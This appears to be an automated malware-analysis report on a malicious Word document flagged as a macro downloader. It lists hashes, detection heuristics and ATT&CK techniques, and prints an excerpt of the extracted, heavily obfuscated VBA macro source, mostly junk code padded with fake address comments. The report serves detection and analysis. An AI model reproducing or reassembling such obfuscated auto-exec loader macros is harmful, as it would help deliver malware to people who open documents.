Office (OLE) malware analysis — malicious · 319019ec8cf18d0d

MALICIOUS

Office (OLE)

248.5 KB Created: 2019-10-09 06:21:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 0a47d774cd6bd5ef88e9a5aea6ae7f61 SHA-1: ca96fc03719f25801c4b69964a70a6e3bb2ef41e SHA-256: 319019ec8cf18d0d64954ef9c16c195881200b5df5f5de8a452124865d04a4b3

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate an auto-executing loader that uses CreateObject and execution sinks, suggesting it downloads and executes a second-stage payload. The ClamAV detection name 'Doc.Downloader.Generic-7290502-0' further supports this downloader behavior.

Heuristics 8

ClamAV: Doc.Downloader.Generic-7290502-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-7290502-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 158164 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	158164 bytes
SHA-256: `edc997b8950dd84e427d24816040cd9dfb74468d9f8030c9e6bac6dd0edb4184`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "b00c50c0112" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "cb29833304005, 0, 0, MSForms, TextBox" Attribute VB_Control = "b07007c2080, 1, 1, MSForms, TextBox" Attribute VB_Control = "b17791x0x93, 2, 2, MSForms, TextBox" Attribute VB_Control = "x1b0b51xx9010, 3, 3, MSForms, TextBox" Attribute VB_Control = "cc07994007401, 4, 4, MSForms, TextBox" Attribute VB_Control = "c0940b4000c08, 5, 5, MSForms, TextBox" Attribute VB_Name = "x084xb58700" Function b6x0038xc96cx() On Error Resume Next 'Central88004 Bauch Prairie, Cleoraville, Germany Future31268 Alayna Keys, North Emelia, Indonesia c5800bb086x = False 'Principal70456 Will Lodge, Port Bertborough, Virgin Islands, British Lead5260 Konopelski Burgs, Lake Shania, Burundi Select Case x3c060039c7x6 'Product3228 Bartell Underpass, East Johann, Panama Regional8864 Tyrell Roads, Weberton, Benin Case b85cc318x432 'Product28520 D'Amore Inlet, New Michelle, Greece Global36381 Schumm Terrace, South Concepcion, Bulgaria 'Legacy849 Aiden Hill, West Kennamouth, Cambodia Principal06422 Jessyca Club, Dooleyfurt, Cameroon x7c42b0c703 = False 'Lead954 Jakubowski Neck, Zellachester, Turkey Product4300 Katheryn Mount, Buckridgeland, Bermuda x3x04464xb006 = x5c75x965718 'International390 Britney Extension, Velvaborough, Mozambique Principal130 Joanie Junction, Wiegandbury, Palau x7073b3x6000 = CInt(b150cbxb99c04 - CByte(xc99005x3c02)) 'Future243 Rocky Mews, West Lurlinehaven, Luxembourg Customer94346 Harvey Extension, Lake Abbigail, Saint Martin x06b902c55840 = Cos(b487520b1x0) 'Dynamic50074 Koelpin Ville, East Marilouhaven, Equatorial Guinea Internal162 Anderson Route, Schroederview, Macedonia x7400c60708 = False 'Regional330 Marlin Prairie, South Ana, Faroe Islands Future517 Noel Run, Stokesview, Saint Helena x92x6x7009b = Rnd(b483b90b00b0) 'Chief0564 Maximus Curve, Odellview, American Samoa Global741 Emily Manors, Austentown, Bahrain Case b107x01cb0c60 'Chief9779 Ullrich Stream, Maxbury, Virgin Islands, U.S. Legacy7929 Francesca Glen, Kamronshire, American Samoa x02c36c3200 = x0c1x2290cb 'District110 Maximus Cliffs, Schadenside, Malaysia Future598 Katlyn Unions, Kaylachester, Poland b20c70509008 = CDbl(x070b00x280) 'National89332 Abbott Islands, Port Enid, Spain Investor422 Henderson Shore, Andersonstad, Kuwait End Select 'Lead710 Koby Ways, Lake Hector, Belize Investor5633 Turner Oval, Cronaburgh, Uzbekistan x739110b06c1 = False 'Human387 Zboncak Run, North Miles, Algeria Customer3157 Savion Wall, Siennaview, Antarctica (the territory South of 60 deg S) 'Forward08416 Wilmer Freeway, Parisianchester, Portugal Dynamic0839 Karina Avenue, Port Rainabury, Afghanistan x36054b731b8b = True 'Product5314 Marquardt Ford, Reillyberg, Guyana Product78790 Keeling Grove, Stantonfort, Bangladesh Select Case c37193098940 'Forward73914 Greyson Underpass, Leonoramouth, Russian Federation Customer833 Andy Villages, East Gunnarville, Nauru Case b832c2729433 'International1728 Hammes Grove, South Matilde, Ghana Central3704 Favian Walk, Carrollside, Ukraine 'Internal23182 Kyla Road, New Rahsaantown, Trinidad and Tobago Principal40022 Thompson Light, Rogahnshire, Zimbabwe x312916x32073 = False 'Dynamic99901 Schroeder Rest, Ryanhaven, Bosnia and Herzegovina Regional830 Hubert Field, North Ansley, Japan xx73x07930207 = c33b426bb6x 'National0838 Cassin Tunnel, East Abigailstad, Faroe Islands Global8726 Feeney Village, Ottilieborough, American Samoa x67004840x0 = CInt(b034104c4412c - CByte(c50x728043x1)) 'Corporate565 Legros Passage, Shanymouth, Eg ... (truncated)

SHA-256: edc997b8950dd84e427d24816040cd9dfb74468d9f8030c9e6bac6dd0edb4184

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "b00c50c0112"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "cb29833304005, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b07007c2080, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b17791x0x93, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x1b0b51xx9010, 3, 3, MSForms, TextBox"
Attribute VB_Control = "cc07994007401, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c0940b4000c08, 5, 5, MSForms, TextBox"

Attribute VB_Name = "x084xb58700"
Function b6x0038xc96cx()
On Error Resume Next
   'Central88004 Bauch Prairie, Cleoraville, Germany Future31268 Alayna Keys, North Emelia, Indonesia
c5800bb086x = False
'Principal70456 Will Lodge, Port Bertborough, Virgin Islands, British Lead5260 Konopelski Burgs, Lake Shania, Burundi
Select Case x3c060039c7x6
'Product3228 Bartell Underpass, East Johann, Panama Regional8864 Tyrell Roads, Weberton, Benin
         Case b85cc318x432
         'Product28520 D'Amore Inlet, New Michelle, Greece Global36381 Schumm Terrace, South Concepcion, Bulgaria
         'Legacy849 Aiden Hill, West Kennamouth, Cambodia Principal06422 Jessyca Club, Dooleyfurt, Cameroon
x7c42b0c703 = False
'Lead954 Jakubowski Neck, Zellachester, Turkey Product4300 Katheryn Mount, Buckridgeland, Bermuda
            x3x04464xb006 = x5c75x965718
            'International390 Britney Extension, Velvaborough, Mozambique Principal130 Joanie Junction, Wiegandbury, Palau
            x7073b3x6000 = CInt(b150cbxb99c04 - CByte(xc99005x3c02))
            'Future243 Rocky Mews, West Lurlinehaven, Luxembourg Customer94346 Harvey Extension, Lake Abbigail, Saint Martin
            x06b902c55840 = Cos(b487520b1x0)
'Dynamic50074 Koelpin Ville, East Marilouhaven, Equatorial Guinea Internal162 Anderson Route, Schroederview, Macedonia
x7400c60708 = False
'Regional330 Marlin Prairie, South Ana, Faroe Islands Future517 Noel Run, Stokesview, Saint Helena
            x92x6x7009b = Rnd(b483b90b00b0)
            'Chief0564 Maximus Curve, Odellview, American Samoa Global741 Emily Manors, Austentown, Bahrain
         Case b107x01cb0c60
         'Chief9779 Ullrich Stream, Maxbury, Virgin Islands, U.S. Legacy7929 Francesca Glen, Kamronshire, American Samoa
            x02c36c3200 = x0c1x2290cb
            'District110 Maximus Cliffs, Schadenside, Malaysia Future598 Katlyn Unions, Kaylachester, Poland
            b20c70509008 = CDbl(x070b00x280)
            'National89332 Abbott Islands, Port Enid, Spain Investor422 Henderson Shore, Andersonstad, Kuwait
End Select
'Lead710 Koby Ways, Lake Hector, Belize Investor5633 Turner Oval, Cronaburgh, Uzbekistan
x739110b06c1 = False
'Human387 Zboncak Run, North Miles, Algeria Customer3157 Savion Wall, Siennaview, Antarctica (the territory South of 60 deg S)
   'Forward08416 Wilmer Freeway, Parisianchester, Portugal Dynamic0839 Karina Avenue, Port Rainabury, Afghanistan
x36054b731b8b = True
'Product5314 Marquardt Ford, Reillyberg, Guyana Product78790 Keeling Grove, Stantonfort, Bangladesh
Select Case c37193098940
'Forward73914 Greyson Underpass, Leonoramouth, Russian Federation Customer833 Andy Villages, East Gunnarville, Nauru
         Case b832c2729433
         'International1728 Hammes Grove, South Matilde, Ghana Central3704 Favian Walk, Carrollside, Ukraine
         'Internal23182 Kyla Road, New Rahsaantown, Trinidad and Tobago Principal40022 Thompson Light, Rogahnshire, Zimbabwe
x312916x32073 = False
'Dynamic99901 Schroeder Rest, Ryanhaven, Bosnia and Herzegovina Regional830 Hubert Field, North Ansley, Japan
            xx73x07930207 = c33b426bb6x
            'National0838 Cassin Tunnel, East Abigailstad, Faroe Islands Global8726 Feeney Village, Ottilieborough, American Samoa
            x67004840x0 = CInt(b034104c4412c - CByte(c50x728043x1))
            'Corporate565 Legros Passage, Shanymouth, Eg
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.